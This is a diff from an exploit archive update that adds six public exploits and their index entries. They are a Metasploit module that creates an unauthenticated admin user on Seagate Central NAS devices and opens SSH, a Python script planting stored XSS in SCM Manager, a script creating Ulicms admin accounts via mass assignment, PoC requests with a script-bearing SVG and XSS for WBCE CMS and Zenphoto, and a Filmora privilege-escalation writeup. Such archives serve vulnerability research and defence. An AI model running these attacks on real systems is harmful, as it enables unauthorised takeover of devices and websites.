DB: 2023-05-26

7 changes to exploits/shellcodes/ghdb

Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)

SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)

Ulicms 2023.1 - create admin user via mass assignment

WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)

Zenphoto 1.6 - Multiple stored XSS

Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation

exploits/hardware/remote/51487.rb

@@ -0,0 +1,218 @@
+##
+# Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)
+# Date: Dec 9 2019
+# Exploit Author: Ege Balci
+# Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/
+# Version: 2015.0916
+# CVE : 2020-6627
+
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/http'
+require 'net/ssh'
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Seagate Central External NAS Arbitrary User Creation",
+      'Description'    => %q{
+        This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
+        Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state
+        and register a new admin user which is capable of SSH access.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Ege Balcı <egebalci@pm.me>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],
+          ['CVE', '2020-6627']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => false,
+          'WfsDelay' => 5,
+        },
+      'Platform'       => ['unix'],
+      'Arch'           => [ARCH_CMD],
+      'Payload'        =>
+      {
+        'Compat' => {
+          'PayloadType'    => 'cmd_interact',
+          'ConnectionType' => 'find'
+        }
+      },
+      'Targets'        =>
+        [
+          ['Auto',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Dec 9 2019",
+      'DefaultTarget'  => 0
+    ))
+
+
+    register_options(
+      [
+        OptString.new('USER', [ true, 'Seagate Central SSH user', '']),
+        OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    },60)
+
+    if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    # First get current state
+    first_state=get_state()
+    if first_state
+      print_status("Current device state: #{first_state['state']}")
+    else
+      return
+    end
+
+    if first_state['state'] != 'start'
+      # Set new start state
+      first_state['state'] = 'start'
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'data'  => "info=#{first_state.to_json}"
+      },60)
+
+      changed_state=get_state()
+      if changed_state && changed_state['state'] == 'start'
+        print_good("State successfully changed !")
+      else
+        print_error("Could not change device state")
+        return
+      end
+    end
+
+    name = Rex::Text.rand_name_male
+    user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"
+    pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)
+
+    print_status('Creating new admin user...')
+    print_status("User: #{user}")
+    print_status("Pass: #{pass}")
+
+    # Add new admin user
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}
+    },60)
+
+
+    conn = do_login(user,pass)
+    if conn
+      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
+      handler(conn.lsock)
+    end
+
+  end
+
+
+
+  def do_login(user, pass)
+    factory = ssh_socket_factory
+    opts = {
+      :auth_methods    => ['password', 'keyboard-interactive'],
+      :port            => 22,
+      :use_agent       => false,
+      :config          => false,
+      :password        => pass,
+      :proxy           => factory,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, user, opts)
+      end
+    rescue Rex::ConnectionError
+      fail_with Failure::Unreachable, 'Connection failed'
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh
+      conn = Net::SSH::CommandStream.new(ssh)
+      ssh = nil
+      return conn
+    end
+
+    return nil
+  end
+
+  def get_state
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    },60)
+
+    if res && (res.code == 200 ||res.code == 100)
+      return res.get_json_document
+    end
+    res = nil
+  end
+end

exploits/multiple/webapps/51488.py

@@ -0,0 +1,91 @@
+#!/usr/bin/python3
+
+# Exploit Title: SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)
+# Google Dork: intitle:"SCM Manager" intext:1.60
+# Date: 05-25-2023
+# Exploit Author: neg0x (https://github.com/n3gox/CVE-2023-33829)
+# Vendor Homepage: https://scm-manager.org/
+# Software Link: https://scm-manager.org/docs/1.x/en/getting-started/
+# Version: 1.2 <= 1.60
+# Tested on: Debian based
+# CVE: CVE-2023-33829
+
+# Modules
+import requests
+import argparse
+import sys
+
+# Main menu
+parser = argparse.ArgumentParser(description='CVE-2023-33829 exploit')
+parser.add_argument("-u", "--user", help="Admin user or user with write permissions")
+parser.add_argument("-p", "--password", help="password of the user")
+args = parser.parse_args()
+
+
+# Credentials
+user = sys.argv[2]
+password = sys.argv[4]
+
+
+# Global Variables
+main_url = "http://localhost:8080/scm" # Change URL if its necessary
+auth_url = main_url + "/api/rest/authentication/login.json"
+users = main_url + "/api/rest/users.json"
+groups = main_url + "/api/rest/groups.json"
+repos = main_url + "/api/rest/repositories.json"
+
+# Create a session
+session = requests.Session()
+
+# Credentials to send
+post_data={
+	'username': user, # change if you have any other user with write permissions
+	'password': password # change if you have any other user with write permissions
+}
+
+r = session.post(auth_url, data=post_data)
+
+if r.status_code == 200:
+	print("[+] Authentication successfully")
+else:
+	print("[-] Failed to authenticate")
+	sys.exit(1)
+
+new_user={
+
+	"name": "newUser",
+	"displayName": "<img src=x onerror=alert('XSS')>",
+	"mail": "",
+	"password": "",
+	"admin": False,
+	"active": True,
+	"type": "xml"
+
+}
+
+create_user = session.post(users, json=new_user)
+print("[+] User with XSS Payload created")
+
+new_group={
+
+	"name": "newGroup",
+	"description": "<img src=x onerror=alert('XSS')>",
+	"type": "xml"
+
+}
+
+create_group = session.post(groups, json=new_group)
+print("[+] Group with XSS Payload created")
+
+new_repo={
+
+	"name": "newRepo",
+	"type": "svn",
+	"contact": "",
+	"description": "<img src=x onerror=alert('XSS')>",
+	"public": False
+
+}
+
+create_repo = session.post(repos, json=new_repo)
+print("[+] Repository with XSS Payload created")

exploits/php/webapps/51484.txt

@@ -0,0 +1,125 @@
+Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
+Version: 1.6.1
+Bugs:  XSS
+Technology: PHP
+Vendor URL: https://wbce-cms.org/
+Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
+Date of found: 03-05-2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+###XSS-1###
+steps:
+
+1. Go to media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/)
+2. upload malicious svg file
+
+svg file content ===>
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+
+
+poc request:
+
+POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
+Host: localhost
+Content-Length: 976
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-platform: "Linux"
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO
+Accept: */*
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167
+Connection: close
+
+------WebKitFormBoundary5u4r3pOGl4EnuBtO
+Content-Disposition: form-data; name="reqid"
+
+187de34ea92ac
+------WebKitFormBoundary5u4r3pOGl4EnuBtO
+Content-Disposition: form-data; name="cmd"
+
+upload
+------WebKitFormBoundary5u4r3pOGl4EnuBtO
+Content-Disposition: form-data; name="target"
+
+l1_Lw
+------WebKitFormBoundary5u4r3pOGl4EnuBtO
+Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+------WebKitFormBoundary5u4r3pOGl4EnuBtO
+Content-Disposition: form-data; name="mtime[]"
+
+1683056102
+------WebKitFormBoundary5u4r3pOGl4EnuBtO--
+
+
+3. go to svg file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg)
+
+
+
+========================================================================================================================
+
+###XSS-2###
+
+1. go to pages  (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages)
+2. add page
+3. write page source content <script>alert(4)</script> (%3Cscript%3Ealert%284%29%3C%2Fscript%3E)
+payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E
+poc request:
+
+POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1
+Host: localhost
+Content-Length: 143
+Cache-Control: max-age=0
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475
+Connection: close
+
+page_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save
+
+
+4. view pages http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php

exploits/php/webapps/51485.txt

@@ -0,0 +1,28 @@
+Exploit Title: Zenphoto 1.6 - Multiple stored XSS
+Application: Zenphoto-1.6 xss poc
+Version: 1.6
+Bugs:  XSS
+Technology: PHP
+Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
+Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
+Date of found: 01-05-2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+###XSS-1###
+steps:
+1. create new album
+2. write Album Description : <iframe src="https://14.rs"></iframe>
+3. save and view album  http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/
+
+=====================================================
+###XSS-2###
+steps:
+1. go to user account and change user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)
+2.change postal code  as <script>alert(4)</script>
+3.if admin user information import as html , xss will trigger
+
+poc video : https://youtu.be/JKdC980ZbLY

exploits/php/webapps/51486.txt

@@ -0,0 +1,35 @@
+#Exploit Title: Ulicms 2023.1 - create admin user via mass assignment
+#Application: Ulicms
+#Version: 2023.1-sniffing-vicuna
+#Bugs:   create admin user via mass assignment
+#Technology: PHP
+#Vendor URL: https://en.ulicms.de/
+#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
+#Date of found: 04-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+##This code is written in python and helps to create an admin account on ulicms-2023.1-sniffing-vicuna
+
+import requests
+
+new_name=input("name: ")
+new_email=input("email: ")
+new_pass=input("password: ")
+
+url = "http://localhost/dist/admin/index.php"
+
+headers = {"Content-Type": "application/x-www-form-urlencoded"}
+
+data = f"sClass=UserController&sMethod=create&add_admin=add_admin&username={new_name}&firstname={new_name}&lastname={new_name}&email={new_email}&password={new_pass}&password_repeat={new_pass}&group_id=1&admin=1&default_language="
+
+response = requests.post(url, headers=headers, data=data)
+
+if response.status_code == 200:
+    print("Request is success and created new admin account")
+
+else:
+    print("Request is failure.!!")
+
+
+#POC video : https://youtu.be/SCkRJzJ0FVk

exploits/windows/local/51483.txt

@@ -0,0 +1,51 @@
+# Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation
+# Date: 20  May 2023
+# Exploit Author: Thurein Soe
+# Vendor Homepage: https://filmora.wondershare.com
+# Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE
+# Version: Filmora 12 ( Build 1.0.0.7)
+# Tested on: Windows 10 (Version 10.0.19045.2965)
+# CVE : CVE-2023-31747
+
+
+Vulnerability description:
+Filmora is a professional video editing software. Wondershare NativePush
+Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare
+NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The
+service name "NativePushService" was vulnerable to unquoted service paths
+vulnerability which led to full local privilege escalation in the affected
+window operating system as the service "NativePushService" was running with
+system privilege that the local user has write access to the directory
+where the service is located. Effectively, the local user is able to
+elevate to local admin upon successfully replacing the affected executable.
+
+
+C:\sc qc NativePushService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: NativePushService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   :
+C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
+NativePush\WsNativePushService.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Wondershare Native Push Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
+NativePush\WsNativePushService.exe"
+
+C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
+NativePush\WsNativePushService.exe
+
+BUILTIN\Users:(ID)F
+
+                      NT AUTHORITY\SYSTEM:(ID)F
+
+                      BUILTIN\Administrators:(ID)F
+
+                      HNINKAYTHAYAR\HninKayThayar:(ID)F

files_exploits.csv

@@ -3869,6 +3869,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51460,exploits/hardware/remote/51460.txt,"Screen SFT DAB 600/C - Unauthenticated Information Disclosure (userManager.cgx)",2023-05-23,LiquidWorm,remote,hardware,,2023-05-23,2023-05-23,0,,,,,,
 50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,,
 37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,,
+51487,exploits/hardware/remote/51487.rb,"Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)",2023-05-25,"Ege Balci",remote,hardware,,2023-05-25,2023-05-25,0,CVE-2020-6627,,,,,
 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548
 50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",2022-03-11,"Aryan Chehreghani",remote,hardware,,2022-03-11,2022-03-11,0,CVE-2020-17456,,,,,
 26412,exploits/hardware/remote/26412.pl,"Seowonintech Devices - Remote Command Execution",2013-06-24,"Todor Donev",remote,hardware,,2013-06-24,2016-12-04,0,OSVDB-94550,,,,,
@@ -12085,6 +12086,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Emircan Baş",webapps,multiple,,2021-05-06,2021-05-07,0,,,,,http://www.exploit-db.comschlix-cms-v2.2.6-6.zip,
 49897,exploits/multiple/webapps/49897.txt,"Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)",2021-05-24,"Emir Polat",webapps,multiple,,2021-05-24,2021-10-29,0,,,,,http://www.exploit-db.comschlix-cms-v2.2.6-6.zip,
 49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple,,2021-05-06,2021-05-06,0,,,,,http://www.exploit-db.comschlix-cms-v2.2.6-6.zip,
+51488,exploits/multiple/webapps/51488.py,"SCM Manager 1.60 - Cross-Site Scripting Stored (Authenticated)",2023-05-25,neg0x,webapps,multiple,,2023-05-25,2023-05-25,0,CVE-2023-33829,,,,,
 50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Remote Code Execution",2021-07-02,"Stig Magnus Baugstø",webapps,multiple,,2021-07-02,2021-10-29,0,CVE-2020-7750,,,,,
 18750,exploits/multiple/webapps/18750.txt,"Scrutinizer NetFlow & sFlow Analyzer - Multiple Vulnerabilities",2012-04-19,"Trustwave's SpiderLabs",webapps,multiple,,2012-04-19,2012-07-28,1,OSVDB-81122;OSVDB-81121;OSVDB-81120;OSVDB-81119;OSVDB-81118;OSVDB-81117;CVE-2012-1261;CVE-2012-1260;CVE-2012-1259;CVE-2012-1258,,,,,https://www.trustwave.com/spiderlabs/advisories/TWSL2012-008.txt
 49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
@@ -31078,6 +31080,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46977,exploits/php/webapps/46977.txt,"UliCMS 2019.1 'Spitting Lama' - Persistent Cross-Site Scripting",2019-06-10,Unk9vvN,webapps,php,80,2019-06-10,2019-06-10,0,CVE-2019-11398,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comulicms-2019.1-spitting-lama-full.zip,
 46741,exploits/php/webapps/46741.txt,"UliCMS 2019.2 / 2019.1 - Multiple Cross-Site Scripting",2019-04-22,"Kağan EĞLENCE",webapps,php,80,2019-04-22,2019-04-22,0,CVE-2019-11398,"Cross-Site Scripting (XSS)",,,,
 48244,exploits/php/webapps/48244.txt,"UliCMS 2020.1 - Persistent Cross-Site Scripting",2020-03-24,SunCSR,webapps,php,,2020-03-24,2020-05-11,0,CVE-2020-12704,,,,,
+51486,exploits/php/webapps/51486.txt,"Ulicms 2023.1 - create admin user via mass assignment",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,0,,,,,,
 39413,exploits/php/webapps/39413.txt,"UliCMS v9.8.1 - SQL Injection",2016-02-04,"Manuel García Cárdenas",webapps,php,80,2016-02-04,2016-02-04,1,,,,,http://www.exploit-db.comulicms-9.8.1-snowfall-full.zip,
 51434,exploits/php/webapps/51434.txt,"Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 51435,exploits/php/webapps/51435.txt,"Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)",2023-05-05,"Mirabbas Ağalarov",webapps,php,,2023-05-05,2023-05-09,1,,,,,,
@@ -31816,6 +31819,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3490,exploits/php/webapps/3490.txt,"wbblog - Cross-Site Scripting / SQL Injection",2007-03-15,"Mehmet Ince",webapps,php,,2007-03-14,,1,OSVDB-34183;CVE-2007-1482;OSVDB-34182;CVE-2007-1481,,,,,
 50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",2021-12-20,citril,webapps,php,,2021-12-20,2021-12-20,0,CVE-2021-3817,,,,,
 50707,exploits/php/webapps/50707.py,"WBCE CMS 1.5.2 - Remote Code Execution (RCE) (Authenticated)",2022-02-04,"Antonio Cuomo",webapps,php,,2022-02-04,2022-02-04,0,,,,,,
+51484,exploits/php/webapps/51484.txt,"WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,,
 51451,exploits/php/webapps/51451.txt,"WBiz Desk 1.2 - SQL Injection",2023-05-23,h4ck3r,webapps,php,,2023-05-23,2023-05-23,0,,,,,,
 7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",webapps,php,,2008-12-03,,1,OSVDB-51579;CVE-2008-5956;OSVDB-51575;CVE-2008-5955;OSVDB-50445;OSVDB-50444,,,,,
 43864,exploits/php/webapps/43864.txt,"Wchat 1.5 - SQL Injection",2018-01-23,"Ihsan Sencan",webapps,php,,2018-01-23,2018-01-23,0,CVE-2018-5979,,,,,
@@ -34340,6 +34344,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39571,exploits/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",webapps,php,80,2016-03-17,2016-03-17,1,,,,,http://www.exploit-db.comzenphoto-zenphoto-1.4.11.tar.gz,
 22524,exploits/php/webapps/22524.txt,"ZenPhoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,webapps,php,,2012-11-06,2012-11-06,1,OSVDB-87033;OSVDB-87032;OSVDB-87031;OSVDB-87030;OSVDB-87029;OSVDB-87028;OSVDB-87027;OSVDB-87026;OSVDB-87025;OSVDB-87024;OSVDB-87023;OSVDB-87022;OSVDB-87021;OSVDB-87020;OSVDB-87019;OSVDB-87018;OSVDB-87017;OSVDB-87016;OSVDB-87015,,,,http://www.exploit-db.comzenphoto-1.4.3.3.tar.gz,http://www.waraxe.us/advisory-96.html
 37602,exploits/php/webapps/37602.txt,"ZenPhoto 1.4.8 - Multiple Vulnerabilities",2015-07-13,"Tim Coen",webapps,php,80,2015-07-13,2015-07-13,0,CVE-2015-5595;CVE-2015-5594;CVE-2015-5591;OSVDB-124783;OSVDB-124461;OSVDB-124460;OSVDB-124459;OSVDB-124458,,,,http://www.exploit-db.comzenphoto-zenphoto-1.4.8.tar.gz,
+51485,exploits/php/webapps/51485.txt,"Zenphoto 1.6 - Multiple stored XSS",2023-05-25,"Mirabbas Ağalarov",webapps,php,,2023-05-25,2023-05-25,1,,,,,,
 14359,exploits/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,webapps,php,,2010-07-14,2010-07-14,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14359.png,http://www.exploit-db.comzenphoto-1.3.tar.gz,
 9166,exploits/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (Cross-Site Request Forgery)",2009-07-16,petros,webapps,php,,2009-07-15,,1,OSVDB-55922;CVE-2009-4563;OSVDB-55921;CVE-2009-4562,,,,,
 48633,exploits/php/webapps/48633.py,"ZenTao Pro 8.8.2 - Command Injection",2020-07-02,"Daniel Monzón",webapps,php,,2020-07-02,2020-07-02,0,,,,,,
@@ -39812,6 +39817,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 964,exploits/windows/local/964.c,"FilePocket 1.2 - Local Proxy Password Disclosure",2005-04-28,Kozan,local,windows,,2005-04-27,,1,OSVDB-14685;CVE-2005-1414,,,,,
 51267,exploits/windows/local/51267.txt,"FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking",2023-04-06,"Bilal Qureshi",local,windows,,2023-04-06,2023-04-06,0,,,,,,
 39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",local,windows,,2016-05-11,2016-05-11,0,,,,,http://www.exploit-db.comFileZilla_3.17.0_win64-setup.exe,
+51483,exploits/windows/local/51483.txt,"Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation",2023-05-25,"Thurein Soe",local,windows,,2023-05-25,2023-05-25,0,CVE-2023-31747,,,,,
 18184,exploits/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",local,windows,,2011-12-01,2011-12-01,0,CVE-2011-5002;OSVDB-77454,"Metasploit Framework (MSF)",,,,http://security-assessment.com/files/documents/advisory/Final_Draft-Multiple_Stack_Buffer_Overflows.pdf
 41709,exploits/windows/local/41709.rb,"Firebird - Relational Database CNCT Group Number Buffer Overflow (Metasploit)",2013-01-31,Metasploit,local,windows,,2017-03-23,2017-03-23,1,CVE-2013-2492;OSVDB-91044,,,,,https://github.com/rapid7/metasploit-framework/blob/b08d1ad8d8d6c0f5cb63cc44e3ff75efb9edb7b3/modules/exploits/windows/misc/fb_cnct_group.rb
 919,exploits/windows/local/919.c,"FireFly 1.0 - Local Proxy Password Disclosure",2005-04-07,Kozan,local,windows,,2005-04-06,,1,OSVDB-15325,,,,,